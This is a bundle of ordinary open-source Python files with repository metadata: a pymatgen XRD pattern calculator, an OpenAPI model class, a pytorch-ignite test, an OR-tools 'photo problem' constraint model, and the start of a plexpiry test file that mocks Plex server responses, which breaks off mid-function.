"CoKb1": 1.63079,
"AgKa": 0.560885,
"AgKa2": 0.563813,
"AgKa1": 0.559421,
"AgKb1": 0.497082,
}
with open(os.path.join(os.path.dirname(__file__),
"atomic_scattering_params.json")) as f:
ATOMIC_SCATTERING_PARAMS = json.load(f)
class XRDPattern(Spectrum):
"""
A representation of an XRDPattern
"""
XLABEL = "$2\\Theta$"
YLABEL = "Intensity"
def __init__(self, x, y, hkls, d_hkls):
"""
Args:
x: Two theta angles.
y: Intensities
hkls: [{(h, k, l): mult}] {(h, k, l): mult} is a dict of Miller
indices for all diffracted lattice facets contributing to each
intensity.
d_hkls: List of interplanar spacings.
"""
        super(XRDPattern, self).__init__(x, y, hkls, d_hkls)
self.hkls = hkls
self.d_hkls = d_hkls
class XRDCalculator(object):
"""
Computes the XRD pattern of a crystal structure.
This code is implemented by Shyue Ping Ong as part of UCSD's NANO106 -
Crystallography of Materials. The formalism for this code is based on
that given in Chapters 11 and 12 of Structure of Materials by Marc De
Graef and Michael E. McHenry. This takes into account the atomic
scattering factors and the Lorentz polarization factor, but not
the Debye-Waller (temperature) factor (for which data is typically not
available). Note that the multiplicity correction is not needed since
this code simply goes through all reciprocal points within the limiting
sphere, which includes all symmetrically equivalent facets. The algorithm
is as follows
1. Calculate reciprocal lattice of structure. Find all reciprocal points
within the limiting sphere given by :math:`\\frac{2}{\\lambda}`.
2. For each reciprocal point :math:`\\mathbf{g_{hkl}}` corresponding to
lattice plane :math:`(hkl)`, compute the Bragg condition
:math:`\\sin(\\theta) = \\frac{\\lambda}{2d_{hkl}}`
3. Compute the structure factor as the sum of the atomic scattering
factors. The atomic scattering factors are given by
.. math::
f(s) = Z - 41.78214 \\times s^2 \\times \\sum\\limits_{i=1}^n a_i \
\\exp(-b_is^2)
where :math:`s = \\frac{\\sin(\\theta)}{\\lambda}` and :math:`a_i`
and :math:`b_i` are the fitted parameters for each element. The
structure factor is then given by
.. math::
F_{hkl} = \\sum\\limits_{j=1}^N f_j \\exp(2\\pi i \\mathbf{g_{hkl}}
\\cdot \\mathbf{r})
4. The intensity is then given by the modulus square of the structure
factor.
.. math::
I_{hkl} = F_{hkl}F_{hkl}^*
5. Finally, the Lorentz polarization correction factor is applied. This
factor is given by:
.. math::
P(\\theta) = \\frac{1 + \\cos^2(2\\theta)}
{\\sin^2(\\theta)\\cos(\\theta)}
"""
# Tuple of available radiation keywords.
AVAILABLE_RADIATION = tuple(WAVELENGTHS.keys())
# Tolerance in which to treat two peaks as having the same two theta.
TWO_THETA_TOL = 1e-5
# Tolerance in which to treat a peak as effectively 0 if the scaled
# intensity is less than this number. Since the max intensity is 100,
# this means the peak must be less than 1e-5 of the peak intensity to be
# considered as zero. This deals with numerical issues where systematic
# absences do not cancel exactly to zero.
SCALED_INTENSITY_TOL = 1e-3
def __init__(self, wavelength="CuKa", symprec=0, debye_waller_factors=None):
"""
Initializes the XRD calculator with a given radiation.
Args:
wavelength (str/float): The wavelength can be specified as either a
float or a string. If it is a string, it must be one of the
supported definitions in the AVAILABLE_RADIATION class
variable, which provides useful commonly used wavelengths.
If it is a float, it is interpreted as a wavelength in
angstroms. Defaults to "CuKa", i.e, Cu K_alpha radiation.
symprec (float): Symmetry precision for structure refinement. If
set to 0, no refinement is done. Otherwise, refinement is
performed using spglib with provided precision.
debye_waller_factors ({element symbol: float}): Allows the
specification of Debye-Waller factors. Note that these
factors are temperature dependent.
"""
if isinstance(wavelength, float):
self.wavelength = wavelength
else:
self.radiation = wavelength
self.wavelength = WAVELENGTHS[wavelength]
self.symprec = symprec
self.debye_waller_factors = debye_waller_factors or {}
def get_xrd_pattern(self, structure, scaled=True, two_theta_range=(0, 90)):
"""
Calculates the XRD pattern for a structure.
Args:
structure (Structure): Input structure
scaled (bool): Whether to return scaled intensities. The maximum
peak is set to a value of 100. Defaults to True. Use False if
you need the absolute values to combine XRD plots.
two_theta_range ([float of length 2]): Tuple for range of
two_thetas to calculate in degrees. Defaults to (0, 90). Set to
None if you want all diffracted beams within the limiting
sphere of radius 2 / wavelength.
Returns:
(XRDPattern)
"""
if self.symprec:
finder = SpacegroupAnalyzer(structure, symprec=self.symprec)
structure = finder.get_refined_structure()
wavelength = self.wavelength
latt = structure.lattice
is_hex = latt.is_hexagonal()
# Obtained from Bragg condition. Note that reciprocal lattice
# vector length is 1 / d_hkl.
min_r, max_r = (0, 2 / wavelength) if two_theta_range is None else \
[2 * sin(radians(t / 2)) / wavelength for t in two_theta_range]
# Obtain crystallographic reciprocal lattice points within range
recip_latt = latt.reciprocal_lattice_crystallographic
recip_pts = recip_latt.get_points_in_sphere(
[[0, 0, 0]], [0, 0, 0], max_r)
if min_r:
recip_pts = [pt for pt in recip_pts if pt[1] >= min_r]
# Create a flattened array of zs, coeffs, fcoords and occus. This is
# used to perform vectorized computation of atomic scattering factors
# later. Note that these are not necessarily the same size as the
# structure as each partially occupied specie occupies its own
# position in the flattened array.
zs = []
coeffs = []
fcoords = []
occus = []
dwfactors = []
for site in structure:
for sp, occu in site.species_and_occu.items():
zs.append(sp.Z)
try:
c = ATOMIC_SCATTERING_PARAMS[sp.symbol]
except KeyError:
raise ValueError("Unable to calculate XRD pattern as "
"there is no scattering coefficients for"
" %s." % sp.symbol)
coeffs.append(c)
dwfactors.append(self.debye_waller_factors.get(sp.symbol, 0))
fcoords.append(site.frac_coords)
occus.append(occu)
zs = np.array(zs)
coeffs = np.array(coeffs)
fcoords = np.array(fcoords)
occus = np.array(occus)
dwfactors = np.array(dwfactors)
peaks = {}
two_thetas = []
for hkl, g_hkl, ind in sorted(
recip_pts, key=lambda i: (i[1], -i[0][0], -i[0][1], -i[0][2])):
# Force miller indices to be integers.
hkl = [int(round(i)) for i in hkl]
if g_hkl != 0:
d_hkl = 1 / g_hkl
# Bragg condition
theta = asin(wavelength * g_hkl / 2)
# s = sin(theta) / wavelength = 1 / 2d = |ghkl| / 2 (d =
# 1/|ghkl|)
s = g_hkl / 2
# Store s^2 since we are using it a few times.
s2 = s ** 2
# Vectorized computation of g.r for all fractional coords and
# hkl.
g_dot_r = np.dot(fcoords, np.transpose([hkl])).T[0]
# Highly vectorized computation of atomic scattering factors.
# Equivalent non-vectorized code is::
#
# for site in structure:
# el = site.specie
# coeff = ATOMIC_SCATTERING_PARAMS[el.symbol]
# fs = el.Z - 41.78214 * s2 * sum(
# [d[0] * exp(-d[1] * s2) for d in coeff])
fs = zs - 41.78214 * s2 * np.sum(
coeffs[:, :, 0] * np.exp(-coeffs[:, :, 1] * s2), axis=1)
dw_correction = np.exp(-dwfactors * s2)
# Structure factor = sum of atomic scattering factors (with
# position factor exp(2j * pi * g.r and occupancies).
# Vectorized computation.
f_hkl = np.sum(fs * occus * np.exp(2j * pi * g_dot_r)
* dw_correction)
# Lorentz polarization correction for hkl
lorentz_factor = (1 + cos(2 * theta) ** 2) / \
(sin(theta) ** 2 * cos(theta))
# Intensity for hkl is modulus square of structure factor.
i_hkl = (f_hkl * f_hkl.conjugate()).real
two_theta = degrees(2 * theta)
if is_hex:
# Use Miller-Bravais indices for hexagonal lattices.
hkl = (hkl[0], hkl[1], - hkl[0] - hkl[1], hkl[2])
# Deal with floating point precision issues.
ind = np.where(np.abs(np.subtract(two_thetas, two_theta)) <
XRDCalculator.TWO_THETA_TOL)
if len(ind[0]) > 0:
peaks[two_thetas[ind[0][0]]][0] += i_hkl * lorentz_factor
peaks[two_thetas[ind[0][0]]][1].append(tuple(hkl))
else:
peaks[two_theta] = [i_hkl * lorentz_factor, [tuple(hkl)],
d_hkl]
two_thetas.append(two_theta)
# Scale intensities so that the max intensity is 100.
max_intensity = max([v[0] for v in peaks.values()])
x = []
y = []
hkls = []
d_hkls = []
for k in sorted(peaks.keys()):
v = peaks[k]
fam = get_unique_families(v[1])
if v[0] / max_intensity * 100 > XRDCalculator.SCALED_INTENSITY_TOL:
x.append(k)
y.append(v[0])
hkls.append(fam)
d_hkls.append(v[2])
xrd = XRDPattern(x, y, hkls, d_hkls)
if scaled:
xrd.normalize(mode="max", value=100)
return xrd
def get_xrd_plot(self, structure, two_theta_range=(0, 90),
annotate_peaks=True, ax=None, with_labels=True,
fontsize=16):
"""
Returns the XRD plot as a matplotlib.pyplot.
Args:
structure: Input structure
two_theta_range ([float of length 2]): Tuple for range of
two_thetas to calculate in degrees. Defaults to (0, 90). Set to
None if you want all diffracted beams within the limiting
sphere of radius 2 / wavelength.
annotate_peaks: Whether to annotate the peaks with plane
information.
ax: matplotlib :class:`Axes` or None if a new figure should be created.
with_labels: True to add xlabels and ylabels to the plot.
fontsize: (int) fontsize for peak labels.
Returns:
(matplotlib.pyplot)
"""
if ax is None:
from pymatgen.util.plotting import pretty_plot
plt = pretty_plot(16, 10)
ax = plt.gca()
else:
# This to maintain the type of the return value.
import matplotlib.pyplot as plt
xrd = self.get_xrd_pattern(structure, two_theta_range=two_theta_range)
for two_theta, i, hkls, d_hkl in zip(xrd.x, xrd.y, xrd.hkls, xrd.d_hkls):
if two_theta_range[0] <= two_theta <= two_theta_range[1]:
label = ", ".join([str(hkl) for hkl in hkls.keys()])
ax.plot([two_theta, two_theta], [0, i], color='k',
linewidth=3, label=label)
if annotate_peaks:
ax.annotate(label, xy=[two_theta, i],
xytext=[two_theta, i], fontsize=fontsize)
if with_labels:
ax.set_xlabel(r"$2\theta$ ($^\circ$)")
ax.set_ylabel("Intensities (scaled)")
if hasattr(ax, "tight_layout"):
ax.tight_layout()
return plt
def show_xrd_plot(self, structure, two_theta_range=(0, 90),
annotate_peaks=True):
"""
Shows the XRD plot.
Args:
structure (Structure): Input structure
two_theta_range ([float of length 2]): Tuple for range of
two_thetas to calculate in degrees. Defaults to (0, 90). Set to
None if you want all diffracted beams within the limiting
sphere of radius 2 / wavelength.
annotate_peaks (bool): Whether to annotate the peaks with plane
information.
"""
self.get_xrd_plot(structure, two_theta_range=two_theta_range,
annotate_peaks=annotate_peaks).show()
@add_fig_kwargs
def plot_structures(self, structures, two_theta_range=(0, 90),
annotate_peaks=True, fontsize=6, **kwargs):
"""
Plot XRD for multiple structures on the same figure.
Args:
structures (Structure): List of structures
two_theta_range ([float of length 2]): Tuple for range of
two_thetas to calculate in degrees. Defaults to (0, 90). Set to
None if you want all diffracted beams within the limiting
sphere of radius 2 / wavelength.
annotate_peaks (bool): Whether to annotate the peaks with plane
information.
fontsize: (int) fontsize for peak labels.
"""
import matplotlib.pyplot as plt
nrows = len(structures)
fig, axes = plt.subplots(nrows=nrows, ncols=1, sharex=True, squeeze=False)
for i, (ax, structure) in enumerate(zip(axes.ravel(), structures)):
self.get_xrd_plot(structure, two_theta_range=two_theta_range,
annotate_peaks=annotate_peaks,
fontsize=fontsize, ax=ax, with_labels=i == nrows - 1)
spg_symbol, spg_number = structure.get_space_group_info()
ax.set_title("{} {} ({}) ".format(structure.formula, spg_symbol, spg_number))
return fig
def get_unique_families(hkls):
"""
Returns unique families of Miller indices. Families must be permutations
of each other.
Args:
hkls ([h, k, l]): List of Miller indices.
Returns:
{hkl: multiplicity}: A dict with unique hkl and multiplicity.
"""
# TODO: Definitely can be sped up.
def is_perm(hkl1, hkl2):
h1 = np.abs(hkl1)
h2 = np.abs(hkl2)
return all([i == j for i, j in zip(sorted(h1), sorted(h2))])
unique = collections.defaultdict(list)
for hkl1 in hkls:
found = False
for hkl2 in unique.keys():
if is_perm(hkl1, hkl2):
found = True
unique[hkl2].append(hkl1)
break
if not found:
unique[hkl1].append(hkl1)
pretty_unique = {}
for k, v in unique.items():
pretty_unique[sorted(v)[-1]] = len(v)
return pretty_unique
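# --- Usage sketch (added for illustration; not part of the original module) ---
# A minimal example of driving the XRDCalculator defined above. The Structure
# and Lattice import paths and the CsCl-type cell used here are assumptions
# about the surrounding pymatgen API, not something taken from this file.
if __name__ == "__main__":
    from pymatgen.core.lattice import Lattice
    from pymatgen.core.structure import Structure

    # Simple cubic CsCl-type cell: Cs on the corner, Cl at the body centre.
    cscl = Structure(Lattice.cubic(4.2), ["Cs", "Cl"],
                     [[0, 0, 0], [0.5, 0.5, 0.5]])

    calc = XRDCalculator(wavelength="CuKa")  # Cu K-alpha, see WAVELENGTHS above
    pattern = calc.get_xrd_pattern(cscl, two_theta_range=(0, 90))

    # Each peak carries: two theta, scaled intensity, {hkl: multiplicity}, d-spacing.
    for two_theta, intensity, hkls, d_hkl in zip(pattern.x, pattern.y,
                                                 pattern.hkls, pattern.d_hkls):
        print("%8.3f %10.3f %s d=%.4f" % (two_theta, intensity, hkls, d_hkl))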
| {
"content_hash": "b042e4e2e9cd5f8fa3d11fd2bb6de70f",
"timestamp": "",
"source": "github",
"line_count": 457,
"max_line_length": 89,
"avg_line_length": 37.74398249452954,
"alnum_prop": 0.5567859006319207,
"repo_name": "setten/pymatgen",
"id": "08d1188342352f370fdcf877307a5477ded86d9c",
"size": "17359",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "pymatgen/analysis/diffraction/xrd.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "5938"
},
{
"name": "CSS",
"bytes": "7550"
},
{
"name": "Common Lisp",
"bytes": "3029065"
},
{
"name": "HTML",
"bytes": "4886182"
},
{
"name": "Makefile",
"bytes": "5573"
},
{
"name": "Perl",
"bytes": "229104"
},
{
"name": "Propeller Spin",
"bytes": "4026362"
},
{
"name": "Python",
"bytes": "6190353"
},
{
"name": "Roff",
"bytes": "868"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from tapi_server.models.base_model_ import Model
from tapi_server.models.tapi_oam_oam_constraint import TapiOamOamConstraint # noqa: F401,E501
from tapi_server.models.tapi_oam_oam_service_end_point import TapiOamOamServiceEndPoint # noqa: F401,E501
from tapi_server import util
class TapiOamCreateoamserviceInput(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, oam_constraint=None, state=None, end_point=None): # noqa: E501
"""TapiOamCreateoamserviceInput - a model defined in OpenAPI
:param oam_constraint: The oam_constraint of this TapiOamCreateoamserviceInput. # noqa: E501
:type oam_constraint: TapiOamOamConstraint
:param state: The state of this TapiOamCreateoamserviceInput. # noqa: E501
:type state: str
:param end_point: The end_point of this TapiOamCreateoamserviceInput. # noqa: E501
:type end_point: List[TapiOamOamServiceEndPoint]
"""
self.openapi_types = {
'oam_constraint': TapiOamOamConstraint,
'state': str,
'end_point': List[TapiOamOamServiceEndPoint]
}
self.attribute_map = {
'oam_constraint': 'oam-constraint',
'state': 'state',
'end_point': 'end-point'
}
self._oam_constraint = oam_constraint
self._state = state
self._end_point = end_point
@classmethod
def from_dict(cls, dikt) -> 'TapiOamCreateoamserviceInput':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The tapi.oam.createoamservice.Input of this TapiOamCreateoamserviceInput. # noqa: E501
:rtype: TapiOamCreateoamserviceInput
"""
return util.deserialize_model(dikt, cls)
@property
def oam_constraint(self):
"""Gets the oam_constraint of this TapiOamCreateoamserviceInput.
:return: The oam_constraint of this TapiOamCreateoamserviceInput.
:rtype: TapiOamOamConstraint
"""
return self._oam_constraint
@oam_constraint.setter
def oam_constraint(self, oam_constraint):
"""Sets the oam_constraint of this TapiOamCreateoamserviceInput.
:param oam_constraint: The oam_constraint of this TapiOamCreateoamserviceInput.
:type oam_constraint: TapiOamOamConstraint
"""
self._oam_constraint = oam_constraint
@property
def state(self):
"""Gets the state of this TapiOamCreateoamserviceInput.
none # noqa: E501
:return: The state of this TapiOamCreateoamserviceInput.
:rtype: str
"""
return self._state
@state.setter
def state(self, state):
"""Sets the state of this TapiOamCreateoamserviceInput.
none # noqa: E501
:param state: The state of this TapiOamCreateoamserviceInput.
:type state: str
"""
self._state = state
@property
def end_point(self):
"""Gets the end_point of this TapiOamCreateoamserviceInput.
none # noqa: E501
:return: The end_point of this TapiOamCreateoamserviceInput.
:rtype: List[TapiOamOamServiceEndPoint]
"""
return self._end_point
@end_point.setter
def end_point(self, end_point):
"""Sets the end_point of this TapiOamCreateoamserviceInput.
none # noqa: E501
:param end_point: The end_point of this TapiOamCreateoamserviceInput.
:type end_point: List[TapiOamOamServiceEndPoint]
"""
self._end_point = end_point
| {
"content_hash": "71b0f3ae7e7782d5e0cedd5454f101ef",
"timestamp": "",
"source": "github",
"line_count": 120,
"max_line_length": 106,
"avg_line_length": 31.675,
"alnum_prop": 0.6521967903183373,
"repo_name": "OpenNetworkingFoundation/ONFOpenTransport",
"id": "33019201dec4ad59ba3b621c3f13534e986f08bc",
"size": "3818",
"binary": false,
"copies": "4",
"ref": "refs/heads/develop",
"path": "RI/flask_server/tapi_server/models/tapi_oam_createoamservice_input.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "D",
"bytes": "2562"
}
],
"symlink_target": ""
} |
import unittest
from ignite.engine import Engine
class TestPytorchIgnite(unittest.TestCase):
def test_engine(self):
def update_fn(engine, batch):
pass
engine = Engine(update_fn)
engine.run([0, 1, 2])
| {
"content_hash": "17b3b3d5b6d22aac5d36065255849c88",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 43,
"avg_line_length": 18.846153846153847,
"alnum_prop": 0.6326530612244898,
"repo_name": "Kaggle/docker-python",
"id": "aef07ff6d381098ec347e8c8f7719df956bf8e04",
"size": "245",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/test_pytorch_ignite.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "9530"
},
{
"name": "Jupyter Notebook",
"bytes": "1778"
},
{
"name": "Python",
"bytes": "159874"
},
{
"name": "Shell",
"bytes": "16313"
},
{
"name": "Smarty",
"bytes": "458"
}
],
"symlink_target": ""
} |
"""
Photo problem in Google CP Solver.
Problem statement from Mozart/Oz tutorial:
http://www.mozart-oz.org/home/doc/fdt/node37.html#section.reified.photo
'''
Betty, Chris, Donald, Fred, Gary, Mary, and Paul want to align in one
row for taking a photo. Some of them have preferences next to whom
they want to stand:
1. Betty wants to stand next to Gary and Mary.
2. Chris wants to stand next to Betty and Gary.
3. Fred wants to stand next to Mary and Donald.
4. Paul wants to stand next to Fred and Donald.
Obviously, it is impossible to satisfy all preferences. Can you find
an alignment that maximizes the number of satisfied preferences?
'''
Oz solution:
6 # alignment(betty:5 chris:6 donald:1 fred:3 gary:7 mary:4 paul:2)
[5, 6, 1, 3, 7, 4, 2]
Compare with the following models:
* MiniZinc: http://www.hakank.org/minizinc/photo_hkj.mzn
* Comet: http://hakank.org/comet/photo_problem.co
* SICStus: http://hakank.org/sicstus/photo_problem.pl
This model was created by Hakan Kjellerstrand ([email protected])
Also see my other Google CP Solver models:
http://www.hakank.org/google_or_tools/
"""
import sys
from ortools.constraint_solver import pywrapcp
def main(show_all_max=0):
# Create the solver.
solver = pywrapcp.Solver("Photo problem")
#
# data
#
persons = ["Betty", "Chris", "Donald", "Fred", "Gary", "Mary", "Paul"]
n = len(persons)
preferences = [
# 0 1 2 3 4 5 6
# B C D F G M P
[0, 0, 0, 0, 1, 1, 0], # Betty 0
[1, 0, 0, 0, 1, 0, 0], # Chris 1
[0, 0, 0, 0, 0, 0, 0], # Donald 2
[0, 0, 1, 0, 0, 1, 0], # Fred 3
[0, 0, 0, 0, 0, 0, 0], # Gary 4
[0, 0, 0, 0, 0, 0, 0], # Mary 5
[0, 0, 1, 1, 0, 0, 0] # Paul 6
]
print("""Preferences:
1. Betty wants to stand next to Gary and Mary.
2. Chris wants to stand next to Betty and Gary.
3. Fred wants to stand next to Mary and Donald.
4. Paul wants to stand next to Fred and Donald.
""")
#
# declare variables
#
positions = [solver.IntVar(0, n - 1, "positions[%i]" % i) for i in range(n)]
# successful preferences
z = solver.IntVar(0, n * n, "z")
#
# constraints
#
solver.Add(solver.AllDifferent(positions))
# calculate all the successful preferences
b = [
solver.IsEqualCstVar(abs(positions[i] - positions[j]), 1)
for i in range(n)
for j in range(n)
if preferences[i][j] == 1
]
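  # Each entry of b above is a reified constraint: IsEqualCstVar(expr, 1)
  # yields a 0/1 variable that equals 1 exactly when |pos_i - pos_j| == 1,
  # i.e. when the two people stand next to each other, so their sum z counts
  # the satisfied preferences.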
solver.Add(z == solver.Sum(b))
#
# Symmetry breaking (from the Oz page):
# Fred is somewhere left of Betty
solver.Add(positions[3] < positions[0])
# objective
objective = solver.Maximize(z, 1)
if show_all_max != 0:
print("Showing all maximum solutions (z == 6).\n")
solver.Add(z == 6)
#
# search and result
#
db = solver.Phase(positions, solver.CHOOSE_FIRST_UNBOUND,
solver.ASSIGN_MAX_VALUE)
if show_all_max == 0:
solver.NewSearch(db, [objective])
else:
solver.NewSearch(db)
num_solutions = 0
while solver.NextSolution():
print("z:", z.Value())
p = [positions[i].Value() for i in range(n)]
print(" ".join(
[persons[j] for i in range(n) for j in range(n) if p[j] == i]))
print("Successful preferences:")
for i in range(n):
for j in range(n):
if preferences[i][j] == 1 and abs(p[i] - p[j]) == 1:
print("\t", persons[i], persons[j])
print()
num_solutions += 1
solver.EndSearch()
print()
print("num_solutions:", num_solutions)
print("failures:", solver.Failures())
print("branches:", solver.Branches())
print("WallTime:", solver.WallTime())
show_all_max = 0 # show all maximal solutions
if __name__ == "__main__":
if len(sys.argv) > 1:
show_all_max = 1
main(show_all_max)
| {
"content_hash": "5989fc9be8c06e8631240c8f3fa539ad",
"timestamp": "",
"source": "github",
"line_count": 141,
"max_line_length": 79,
"avg_line_length": 27.00709219858156,
"alnum_prop": 0.6100315126050421,
"repo_name": "google/or-tools",
"id": "6a513d848019f534cd506a8596f4e612a1c3cfce",
"size": "4408",
"binary": false,
"copies": "2",
"ref": "refs/heads/stable",
"path": "examples/contrib/photo_problem.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "18599"
},
{
"name": "C",
"bytes": "11382"
},
{
"name": "C#",
"bytes": "498888"
},
{
"name": "C++",
"bytes": "14071164"
},
{
"name": "CMake",
"bytes": "219723"
},
{
"name": "Dockerfile",
"bytes": "149476"
},
{
"name": "Java",
"bytes": "459136"
},
{
"name": "Lex",
"bytes": "2271"
},
{
"name": "Makefile",
"bytes": "207007"
},
{
"name": "Python",
"bytes": "629275"
},
{
"name": "SWIG",
"bytes": "414259"
},
{
"name": "Shell",
"bytes": "83555"
},
{
"name": "Starlark",
"bytes": "235950"
},
{
"name": "Yacc",
"bytes": "26027"
},
{
"name": "sed",
"bytes": "45"
}
],
"symlink_target": ""
} |
import ConfigParser
import fixtures
import os
import testtools
import urlparse
from plexpiry import plexpiry
FAKE_DICT = {'a': 1,
'b': 2,
'c': 3,
'd': 4,
}
# FIXME: Check this against a real response
FAKE_SECTIONS = {'show': {'key': '2', 'title': 'TV Shows'},
'movie': {'key': '1', 'title': 'Movies'},
}
FAKE_TV_TREE = {'425':
{'seasons':
{'426':
{'episodes':
{'433':
{'addedAt': '1401322741',
'lastViewedAt': '1401322997',
'originallyAvailableAt': '2007-05-21',
'ratingKey': '433',
'title': 'Episode 7',
'viewCount': '1'}},
'title': 'Season 1'},
'434':
{'episodes':
{'433':
{'addedAt': '1401322741',
'lastViewedAt': '1401322997',
'originallyAvailableAt': '2007-05-21',
'ratingKey': '433',
'title': 'Episode 7',
'viewCount': '1'}},
'title': 'Season 2'}},
'title': 'Spaced'}}
FAKE_TV_SHOWS = {'425': {'title': 'Spaced'}}
FAKE_TV_SEASONS = {'426': {'title': 'Season 1'}, '434': {'title': 'Season 2'}}
FAKE_TV_EPISODES = {'433': {'addedAt': '1401322741',
'lastViewedAt': '1401322997',
'originallyAvailableAt': '2007-05-21',
'ratingKey': '433',
'title': 'Episode 7',
'viewCount': '1'}}
FAKE_TV_EPISODE = {'addedAt': '1401322741',
'art': '/library/metadata/425/art/1401322765',
'contentRating': 'Caution',
'duration': '1491000',
'grandparentKey': '/library/metadata/425',
'grandparentRatingKey': '425',
'grandparentTheme':
'/library/metadata/425/theme/1401322765',
'grandparentThumb':
'/library/metadata/425/thumb/1401322765',
'grandparentTitle': 'Spaced',
'guid': 'com.plexapp.agents.thetvdb://72658/1/7?lang=en',
'index': '7',
'key': '/library/metadata/433',
'lastViewedAt': '1401322997',
'originallyAvailableAt': '2007-05-21',
'parentIndex': '1',
'parentKey': '/library/metadata/426',
'parentRatingKey': '426',
'parentThumb': '/library/metadata/426/thumb/1401322765',
'rating': '8.3',
'ratingKey': '433',
'summary': "Daisy and Tim's domestic bliss is threatened "
"when Tim's ex-girlfriend reappears and wants "
"to get back together with him. Adult themes "
"and strong language",
'thumb': '/library/metadata/433/thumb/1401322765',
'title': 'Episode 7',
'type': 'episode',
'updatedAt': '1401322765',
'viewCount': '1',
'year': '2007'}
FAKE_MOVIES = {'1024': {'addedAt': '1418348404',
'lastViewedAt': '1418653256',
'originallyAvailableAt': '2013-09-02',
'ratingKey': '1024',
'title': 'The Zero Theorem',
'viewCount': '1'},
'1135': {'addedAt': '1421060244',
'lastViewedAt': '1421675051',
'originallyAvailableAt': '2014-08-16',
'ratingKey': '1135',
'title': 'Zodiac: Signs of the Apocalypse',
'viewCount': '1'}}
FAKE_MOVIE_ONE = {'addedAt': '1418348404',
'art': '/library/metadata/1024/art/1418349807',
'chapterSource': 'media',
'contentRating': '15+',
'duration': '6387304',
'guid': 'com.plexapp.agents.imdb://tt2333804?lang=en',
'key': '/library/metadata/1024',
'lastViewedAt': '1418653256',
'originallyAvailableAt': '2013-09-02',
'rating': '5.9',
'ratingKey': '1024',
'studio': 'Picture Perfect Corporation',
'summary': "A computer hacker's goal to discover the reason "
"for human existence continually finds his work "
"interrupted thanks to the Management; this time"
", they send a teenager and lusty love interest "
"to distract him.",
'tagline': 'Nothing is Everything',
'thumb': '/library/metadata/1024/thumb/1418349807',
'title': 'The Zero Theorem',
'titleSort': 'Zero Theorem',
'type': 'movie',
'updatedAt': '1418349807',
'viewCount': '1',
'year': '2013'}
FAKE_PATH = os.path.dirname(__file__)
FAKE_SECTIONS_XML = os.path.join(FAKE_PATH, "fake_sections.xml")
FAKE_SECTION_2_XML = os.path.join(FAKE_PATH, "fake_section_2.xml")
FAKE_TV_TREE_XML = os.path.join(FAKE_PATH, "fake_tv_tree.xml")
FAKE_TV_SHOWS_XML = os.path.join(FAKE_PATH, "fake_tv_shows.xml")
FAKE_TV_SEASONS_XML = os.path.join(FAKE_PATH, "fake_tv_seasons.xml")
FAKE_TV_EPISODES_XML = os.path.join(FAKE_PATH, "fake_tv_episodes.xml")
FAKE_TV_EPISODE_XML = os.path.join(FAKE_PATH, "fake_tv_episode.xml")
FAKE_TV_EPISODE_METADATA_XML = os.path.join(FAKE_PATH,
"fake_tv_episode_metadata.xml")
FAKE_TV_EPISODE_2448_XML = os.path.join(FAKE_PATH, "2448.xml")
FAKE_TV_EPISODE_2254_XML = os.path.join(FAKE_PATH, "2254.xml")
FAKE_TV_EPISODE_2257_XML = os.path.join(FAKE_PATH, "2257.xml")
FAKE_TV_EPISODE_433_XML = os.path.join(FAKE_PATH, "433.xml")
FAKE_MOVIES_XML = os.path.join(FAKE_PATH, "fake_movies.xml")
FAKE_MOVIE_ONE_XML = os.path.join(FAKE_PATH, "fake_movie_one.xml")
FAKE_MOVIE_TWO_XML = os.path.join(FAKE_PATH, "fake_movie_two.xml")
GOOD_CONFIG_FILE = os.path.join(FAKE_PATH, "good_config_file.conf")
BAD_CONFIG_FILE = os.path.join(FAKE_PATH, "bad_config_file.conf")
BAD_CONFIG_FILE2 = os.path.join(FAKE_PATH, "bad_config_file2.conf")
EMPTY_CONFIG_FILE = os.path.join(FAKE_PATH, "empty_file")
NON_EXPIRING_CONFIG_FILE = os.path.join(FAKE_PATH,
"non_expiring_config_file.conf")
IGNORE_CONFIG_FILE = os.path.join(FAKE_PATH, "ignore.conf")
NEVER_EXPIRE_CONFIG_FILE = os.path.join(FAKE_PATH, "never_expire.conf")
FAKE_EMPTY = os.path.join(FAKE_PATH, "empty_file")
TEST_TV_SHOW = 425
TEST_TV_SEASON = 426
TEST_TV_EPISODE = 433
TEST_MOVIE = 1024
FAKE_OPTIONS = ["-s", "fakeserver", "-p", "1234", "-c", GOOD_CONFIG_FILE]
FAKE_BADCONFIGFILE_OPTIONS = ["-s", "fakeserver", "-p", "1234",
"-c", BAD_CONFIG_FILE]
class TestPlexpiry(testtools.TestCase):
def setUp(self):
super(TestPlexpiry, self).setUp()
def fake_urlopen(url):
url = urlparse.urlparse(url)
if url.path == "/library/sections":
return open(FAKE_SECTIONS_XML)
if url.path == "/library/sections/1/all":
return open(FAKE_MOVIES_XML)
if url.path == "/library/sections/2/all":
return open(FAKE_TV_SHOWS_XML)
if url.path == "/library/metadata/1024":
return open(FAKE_MOVIE_ONE_XML)
if url.path == "/library/metadata/1135":
return open(FAKE_MOVIE_TWO_XML)
if url.path == "/library/metadata/425/children":
return open(FAKE_TV_SEASONS_XML)
if url.path == "/library/metadata/426/children":
return open(FAKE_TV_EPISODES_XML)
if url.path == "/library/metadata/433/children":
return open(FAKE_TV_EPISODE_XML)
if url.path == "/library/metadata/2251":
return open(FAKE_TV_EPISODE_METADATA_XML)
if url.path == "/library/metadata/2448":
return open(FAKE_TV_EPISODE_2448_XML)
if url.path == "/library/metadata/2254":
return open(FAKE_TV_EPISODE_2254_XML)
if url.path == "/library/metadata/2257":
return open(FAKE_TV_EPISODE_2257_XML)
if url.path == "/library/metadata/433":
return open(FAKE_TV_EPISODE_433_XML)
if url.path == "/library/metadata/2":
return open(FAKE_SECTION_2_XML)
if url.path == "/library/sections/1/refresh":
return open(FAKE_EMPTY)
if url.path == "/library/sections/2/refresh":
return open(FAKE_EMPTY)
if url.path == "/library/metadata/434/children":
